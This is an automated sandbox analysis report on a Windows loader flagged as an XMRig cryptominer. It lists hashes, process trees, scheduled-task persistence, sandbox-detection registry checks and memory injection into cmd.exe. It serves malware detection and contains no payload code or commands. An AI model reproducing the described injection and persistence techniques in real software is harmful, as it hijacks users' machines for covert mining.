xmrig | 9453e534ac5d592422c62334b9672547f57f4ec3abba92162566cae795c0b04b

Resubmissions

12-07-2021 13:54

210712-pfqcwwb6ya 10

12-07-2021 13:51

210712-7pd4cbf21a 3

Analysis

max time kernel
300s
max time network
309s
platform
windows10_x64
resource
win10v20210410
submitted
12-07-2021 13:54

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

LOADER/SOUFIWSHIT.exe
Size

2.2MB
MD5

60f572f21737ea9fc28d6c86bad8fb10
SHA1

fcad5bfd745b308eb618b887d40e888fd493fdfe
SHA256

12b95a1d99a59ce67eba7c4f4661febe5fd14d84b1a20eaabdeb52a6fe8fc71f
SHA512

3695b8177f8d2b4ce29827c2d1ae3b0a164d9958d14b2fa0731570106c4019d02626fc6a66b134f70dd574a24343b9a27dfb101309e95c942ccece4a8559f39b

Score

10^/10

xmrig miner

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner Payload 2 IoCs

miner

Processes:

resource	yara_rule
behavioral1/memory/4304-838-0x0000000140000000-0x0000000140758000-memory.dmp	xmrig
behavioral1/memory/4304-839-0x00000001402EB66C-mapping.dmp	xmrig

Blocklisted process makes network request 2 IoCs

Processes:

cmd.exe

flow pid process

17 4304 cmd.exe
19 4304 cmd.exe
Executes dropped EXE 6 IoCs

Processes:

sihost64.exechrome_proxy.exesihost64.exesihost64.exechrome_proxy.exesihost64.exe

pid process

2476 sihost64.exe
2252 chrome_proxy.exe
4124 sihost64.exe
1256 sihost64.exe
4900 chrome_proxy.exe
3636 sihost64.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Suspicious use of SetThreadContext 1 IoCs

Processes:

chrome_proxy.exe

description pid process target process

PID 2252 set thread context of 4304 2252 chrome_proxy.exe cmd.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

flow	pid	process
17	4304	cmd.exe
19	4304	cmd.exe

pid	process
2476	sihost64.exe
2252	chrome_proxy.exe
4124	sihost64.exe
1256	sihost64.exe
4900	chrome_proxy.exe
3636	sihost64.exe

description	pid	process	target process
PID 2252 set thread context of 4304	2252	chrome_proxy.exe	cmd.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

taskmgr.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\FriendlyName	taskmgr.exe

Checks processor information in registry 2 TTPs 5 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

taskmgr.exefirefox.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	taskmgr.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe

Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

1764 schtasks.exe
732 schtasks.exe
4948 schtasks.exe
4168 schtasks.exe
4776 schtasks.exe

pid	process
1764	schtasks.exe
732	schtasks.exe
4948	schtasks.exe
4168	schtasks.exe
4776	schtasks.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

chrome.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe

Modifies registry class 53 IoCs

Processes:

chrome.exetaskmgr.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByDirection = "1"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 020000000100000000000000ffffffff	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\FFlags = "1092616257"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202020202020202	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell\SniffedFolderType = "Generic"	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\FFlags = "1"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000007800000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	chrome.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\Shell	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\NodeSlot = "11"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByKey:PID = "0"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\IconSize = "48"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2 = 3a001f44471a0359723fa74489c55595fe6b30ee260001002600efbe10000000b97bc966d72dd701d396dbf2db2dd701d396dbf2db2dd70114000000	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupView = "0"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1"	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202020202020202	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0\0\0\0\1	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\Mode = "1"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings	taskmgr.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff	chrome.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a000000a000000030f125b7ef471a10a5f102608c9eebac0e0000007800000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\0	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 010000000200000000000000ffffffff	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0	chrome.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\MRUListEx = ffffffff	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\LogicalViewMode = "3"	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1"	chrome.exe

Opens file in notepad (likely ransom note) 1 IoCs
ransomware

Processes:

NOTEPAD.EXE

pid process

1256 NOTEPAD.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exeSOUFIWSHIT.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exetaskmgr.exepowershell.exe

pid	process
1052	powershell.exe
1052	powershell.exe
1052	powershell.exe
3768	powershell.exe
3768	powershell.exe
3768	powershell.exe
3884	powershell.exe
3884	powershell.exe
3884	powershell.exe
3332	powershell.exe
3332	powershell.exe
3332	powershell.exe
1664	SOUFIWSHIT.exe
1664	SOUFIWSHIT.exe
2456	powershell.exe
2456	powershell.exe
1244	powershell.exe
1244	powershell.exe
2456	powershell.exe
1244	powershell.exe
1664	powershell.exe
1664	powershell.exe
900	powershell.exe
900	powershell.exe
1664	powershell.exe
900	powershell.exe
2716	powershell.exe
2716	powershell.exe
2456	powershell.exe
2456	powershell.exe
2716	powershell.exe
2456	powershell.exe
2136	powershell.exe
3960	powershell.exe
2136	powershell.exe
3960	powershell.exe
2136	powershell.exe
3960	powershell.exe
2280	powershell.exe
2280	powershell.exe
2280	powershell.exe
1732	powershell.exe
1732	powershell.exe
1732	powershell.exe
2280	powershell.exe
2280	powershell.exe
2280	powershell.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
2752	powershell.exe
2752	powershell.exe
2752	powershell.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

taskmgr.exe

pid process

3360 taskmgr.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	1052	powershell.exe
Token: SeIncreaseQuotaPrivilege	1052	powershell.exe
Token: SeSecurityPrivilege	1052	powershell.exe
Token: SeTakeOwnershipPrivilege	1052	powershell.exe
Token: SeLoadDriverPrivilege	1052	powershell.exe
Token: SeSystemProfilePrivilege	1052	powershell.exe
Token: SeSystemtimePrivilege	1052	powershell.exe
Token: SeProfSingleProcessPrivilege	1052	powershell.exe
Token: SeIncBasePriorityPrivilege	1052	powershell.exe
Token: SeCreatePagefilePrivilege	1052	powershell.exe
Token: SeBackupPrivilege	1052	powershell.exe
Token: SeRestorePrivilege	1052	powershell.exe
Token: SeShutdownPrivilege	1052	powershell.exe
Token: SeDebugPrivilege	1052	powershell.exe
Token: SeSystemEnvironmentPrivilege	1052	powershell.exe
Token: SeRemoteShutdownPrivilege	1052	powershell.exe
Token: SeUndockPrivilege	1052	powershell.exe
Token: SeManageVolumePrivilege	1052	powershell.exe
Token: 33	1052	powershell.exe
Token: 34	1052	powershell.exe
Token: 35	1052	powershell.exe
Token: 36	1052	powershell.exe
Token: SeDebugPrivilege	3768	powershell.exe
Token: SeIncreaseQuotaPrivilege	3768	powershell.exe
Token: SeSecurityPrivilege	3768	powershell.exe
Token: SeTakeOwnershipPrivilege	3768	powershell.exe
Token: SeLoadDriverPrivilege	3768	powershell.exe
Token: SeSystemProfilePrivilege	3768	powershell.exe
Token: SeSystemtimePrivilege	3768	powershell.exe
Token: SeProfSingleProcessPrivilege	3768	powershell.exe
Token: SeIncBasePriorityPrivilege	3768	powershell.exe
Token: SeCreatePagefilePrivilege	3768	powershell.exe
Token: SeBackupPrivilege	3768	powershell.exe
Token: SeRestorePrivilege	3768	powershell.exe
Token: SeShutdownPrivilege	3768	powershell.exe
Token: SeDebugPrivilege	3768	powershell.exe
Token: SeSystemEnvironmentPrivilege	3768	powershell.exe
Token: SeRemoteShutdownPrivilege	3768	powershell.exe
Token: SeUndockPrivilege	3768	powershell.exe
Token: SeManageVolumePrivilege	3768	powershell.exe
Token: 33	3768	powershell.exe
Token: 34	3768	powershell.exe
Token: 35	3768	powershell.exe
Token: 36	3768	powershell.exe
Token: SeDebugPrivilege	3884	powershell.exe
Token: SeIncreaseQuotaPrivilege	3884	powershell.exe
Token: SeSecurityPrivilege	3884	powershell.exe
Token: SeTakeOwnershipPrivilege	3884	powershell.exe
Token: SeLoadDriverPrivilege	3884	powershell.exe
Token: SeSystemProfilePrivilege	3884	powershell.exe
Token: SeSystemtimePrivilege	3884	powershell.exe
Token: SeProfSingleProcessPrivilege	3884	powershell.exe
Token: SeIncBasePriorityPrivilege	3884	powershell.exe
Token: SeCreatePagefilePrivilege	3884	powershell.exe
Token: SeBackupPrivilege	3884	powershell.exe
Token: SeRestorePrivilege	3884	powershell.exe
Token: SeShutdownPrivilege	3884	powershell.exe
Token: SeDebugPrivilege	3884	powershell.exe
Token: SeSystemEnvironmentPrivilege	3884	powershell.exe
Token: SeRemoteShutdownPrivilege	3884	powershell.exe
Token: SeUndockPrivilege	3884	powershell.exe
Token: SeManageVolumePrivilege	3884	powershell.exe
Token: 33	3884	powershell.exe
Token: 34	3884	powershell.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

NOTEPAD.EXEtaskmgr.exe

pid	process
1256	NOTEPAD.EXE
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

Processes:

taskmgr.exe

pid	process
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe
3360	taskmgr.exe

Suspicious use of SetWindowsHookEx 8 IoCs

Processes:

chrome.exe

pid process

5224 chrome.exe
5224 chrome.exe
5224 chrome.exe
5224 chrome.exe
5224 chrome.exe
5224 chrome.exe
5224 chrome.exe
5224 chrome.exe

pid	process
5224	chrome.exe
5224	chrome.exe
5224	chrome.exe
5224	chrome.exe
5224	chrome.exe
5224	chrome.exe
5224	chrome.exe
5224	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

SOUFIWSHIT.execmd.execmd.exesihost64.exechrome_proxy.execmd.execmd.exeSOUFIWSHIT.execmd.execmd.exesihost64.execmd.exe

description	pid	process	target process
PID 1664 wrote to memory of 580	1664	SOUFIWSHIT.exe	cmd.exe
PID 1664 wrote to memory of 580	1664	SOUFIWSHIT.exe	cmd.exe
PID 580 wrote to memory of 1052	580	cmd.exe	powershell.exe
PID 580 wrote to memory of 1052	580	cmd.exe	powershell.exe
PID 580 wrote to memory of 3768	580	cmd.exe	powershell.exe
PID 580 wrote to memory of 3768	580	cmd.exe	powershell.exe
PID 580 wrote to memory of 3884	580	cmd.exe	powershell.exe
PID 580 wrote to memory of 3884	580	cmd.exe	powershell.exe
PID 580 wrote to memory of 3332	580	cmd.exe	powershell.exe
PID 580 wrote to memory of 3332	580	cmd.exe	powershell.exe
PID 1664 wrote to memory of 504	1664	SOUFIWSHIT.exe	cmd.exe
PID 1664 wrote to memory of 504	1664	SOUFIWSHIT.exe	cmd.exe
PID 504 wrote to memory of 1764	504	cmd.exe	schtasks.exe
PID 504 wrote to memory of 1764	504	cmd.exe	schtasks.exe
PID 1664 wrote to memory of 2476	1664	SOUFIWSHIT.exe	sihost64.exe
PID 1664 wrote to memory of 2476	1664	SOUFIWSHIT.exe	sihost64.exe
PID 1664 wrote to memory of 2252	1664	SOUFIWSHIT.exe	chrome_proxy.exe
PID 1664 wrote to memory of 2252	1664	SOUFIWSHIT.exe	chrome_proxy.exe
PID 2476 wrote to memory of 1320	2476	sihost64.exe	cmd.exe
PID 2476 wrote to memory of 1320	2476	sihost64.exe	cmd.exe
PID 2252 wrote to memory of 2584	2252	chrome_proxy.exe	cmd.exe
PID 2252 wrote to memory of 2584	2252	chrome_proxy.exe	cmd.exe
PID 1320 wrote to memory of 2456	1320	cmd.exe	powershell.exe
PID 1320 wrote to memory of 2456	1320	cmd.exe	powershell.exe
PID 2584 wrote to memory of 1244	2584	cmd.exe	powershell.exe
PID 2584 wrote to memory of 1244	2584	cmd.exe	powershell.exe
PID 2584 wrote to memory of 1664	2584	cmd.exe	powershell.exe
PID 2584 wrote to memory of 1664	2584	cmd.exe	powershell.exe
PID 1320 wrote to memory of 900	1320	cmd.exe	powershell.exe
PID 1320 wrote to memory of 900	1320	cmd.exe	powershell.exe
PID 2584 wrote to memory of 2716	2584	cmd.exe	powershell.exe
PID 2584 wrote to memory of 2716	2584	cmd.exe	powershell.exe
PID 1320 wrote to memory of 2456	1320	cmd.exe	powershell.exe
PID 1320 wrote to memory of 2456	1320	cmd.exe	powershell.exe
PID 2584 wrote to memory of 2136	2584	cmd.exe	powershell.exe
PID 2584 wrote to memory of 2136	2584	cmd.exe	powershell.exe
PID 1320 wrote to memory of 3960	1320	cmd.exe	powershell.exe
PID 1320 wrote to memory of 3960	1320	cmd.exe	powershell.exe
PID 4008 wrote to memory of 3012	4008	SOUFIWSHIT.exe	cmd.exe
PID 4008 wrote to memory of 3012	4008	SOUFIWSHIT.exe	cmd.exe
PID 3012 wrote to memory of 2280	3012	cmd.exe	powershell.exe
PID 3012 wrote to memory of 2280	3012	cmd.exe	powershell.exe
PID 3012 wrote to memory of 1732	3012	cmd.exe	powershell.exe
PID 3012 wrote to memory of 1732	3012	cmd.exe	powershell.exe
PID 3012 wrote to memory of 2280	3012	cmd.exe	powershell.exe
PID 3012 wrote to memory of 2280	3012	cmd.exe	powershell.exe
PID 3012 wrote to memory of 2752	3012	cmd.exe	powershell.exe
PID 3012 wrote to memory of 2752	3012	cmd.exe	powershell.exe
PID 2252 wrote to memory of 4016	2252	chrome_proxy.exe	cmd.exe
PID 2252 wrote to memory of 4016	2252	chrome_proxy.exe	cmd.exe
PID 4016 wrote to memory of 732	4016	cmd.exe	schtasks.exe
PID 4016 wrote to memory of 732	4016	cmd.exe	schtasks.exe
PID 2252 wrote to memory of 4124	2252	chrome_proxy.exe	sihost64.exe
